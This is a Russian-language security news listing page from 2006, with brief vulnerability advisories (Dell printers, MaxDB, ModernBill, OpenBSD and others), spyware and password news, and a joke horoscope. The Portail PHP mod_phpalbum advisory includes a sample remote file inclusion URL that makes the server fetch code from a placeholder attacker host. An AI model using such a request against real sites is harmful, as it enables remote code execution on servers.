Темы статей |
| Системы безопасности связи |
|
Овен Это не ваша неделя, ma belle. Компьютер окажется злобным придурковатым инопланетным захватчиком, Windows откроется в иное измерение, файловая система посыплется на вашу несчастную голову. Спасение кроется в жертвоприношении бутылки пива системному администратору. Телец Бузят электроны. Летят электроны. Отличное время для программистов и вирусописателей родившихся под знаком говядины. Строчки кода забьют фонтаном из мозга прямо на экран. Не упустите свой шанс – сделайте халтур...
Множественные уязвимости в Dell Color Laser Printer 31-08-2006 Системы безопасности связи Программа: Dell Color Laser Printer 5110cn Dell Color Laser Printer 5100cn Dell Color Laser Printer 3110cn Dell Color Laser Printer 3100cn Dell Color Laser Printer 3010cn Dell Color Laser Printer 3000cn Обнаруженные уязвимости позволяют удаленному пользователю обойти некоторые ограничения безопасности и вызвать отказ в обслуживании. 1. Встроенный FTP сервер не запрещает использование команды FTP PORT. Злоумышленник может подключиться к произвольной системе с помощью FTP сервера. ...
Переполнение буфера в MaxDB 31-08-2006 Системы безопасности связи Программа: MaxDB 7.6.00.22, возможно более ранние версии. Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки проверки границ данных в WebDBM при обработке имен баз данных. Удаленный пользователь может с помощью HTTP запроса, содержащего слишком длинное имя базы, вызвать переполнение буфера и выполнить произвольный код на целевой системе.
Раскрытие данных в ModernBill 31-08-2006 Системы безопасности связи Программа: ModernBill 5.0.1 и 5.0.4, возможно другие версии. Уязвимость позволяет удаленному пользователю получить доступ к важным данным на системе. Уязвимость существует из-за того, что приложение вызывает CURL с CURLOPT_SSL_VERIFYPEER, а опция CURLOPT_SSL_VERIFYHOST установлена в false во время подключения к платежному шлюзу через SSL. Библиотека CURL может некорректно подтвердить подлинность сертификата и позволить злоумышленнику произвести атаку «человек по средине».
Раскрытие данных в xbiff2 31-08-2006 Системы безопасности связи Программа: xbiff2 1.9 для Linux, возможно другие версии. Уязвимость позволяет локальному пользователю получить доступ к важным данным на системе. Уязвимость существует из-за ошибки в конфигурационном механизме xbiff2, который создает $HOME/.xbiff2rc с привилегиями на доступ 755. Злоумышленник может получить доступ к аутентификационным данным POP и IMAP пользователя.
Обход ограничений безопасности & 30-08-2006 Системы безопасности связи Программа: OpenBSD 3.8, 3.9 Уязвимость позволяет удаленному пользователю обойти некоторые ограничения безопасности. Уязвимость существует из-за того, что демон isakmpd во время ответа SA создает окно, размер которого равен 0. Злоумышленник может перехватить IPSec пакеты и затем повторить их.
Шпионские программы заразили 90% к 30-08-2006 Системы безопасности связи Каждые 9 из 10 персональных компьютеров заражены шпионскими программами. После осени 2005 года, уровень распространения шпионских программ опять достиг своего высочайшего уровня, зафиксированного прежде в 2004 году, утверждают исследователи из компании Webroot Software. «Менее года назад, многие эксперты по интернет-безопасности стали заявлять о снижении уровня распространенности шпионских программ и о том, что этот уровень в скором времени достигнет минимума. Пока данные о степени р...
Русский вошел в десятку самых поп 30-08-2006 Системы безопасности связи Агентство Miniwatts Marketing Group опубликовало результаты нового исследования, в ходе которого выяснило, на каких языках общаются пользователи Интернета. Приятной неожиданностью для всех русскоговорящих людей стало появление нашего языка в списке. Правда, он занял лишь десятое место. Первую позицию, что совершенно закономерно, занял английский язык - на нем разговаривают 30% от числа всех интернетчиков, или почти 313 миллионов человек. Второе место досталось китайскому, которым изъясняются ...
PHP-инклюдинг в Portail PHP mod_phpalbum 30-08-2006 Системы безопасности связи Программа: Portail PHP mod_phpalbum 2.15 Нападающий может выполнить произвольный PHP-код на сервере. Пример: http://www.site.com/[path]/mod_phpalbum/ sommaire_admin.php?chemin=http://evil_scripts?
Новые системы паролей 30-08-2006 Системы безопасности связи Прошли те времена, когда надёжным паролем считался код от 7 до 14 знаков, состоящий из смеси букв, цифр и символов. Пароли Windows могут содержать до 127 символов, но пользы от этого никакой. Как известно, самым уязвимым звеном безопасности является непосредственно сам пользователь, который не в силах удержать в памяти несколько сложных паролей. Порой, не в силах запомнить и один. До сих пор в большинстве случаев используется известное слово или имя, в лучшем случае снабжённое несколькими дополн...
|
||||||||||
|
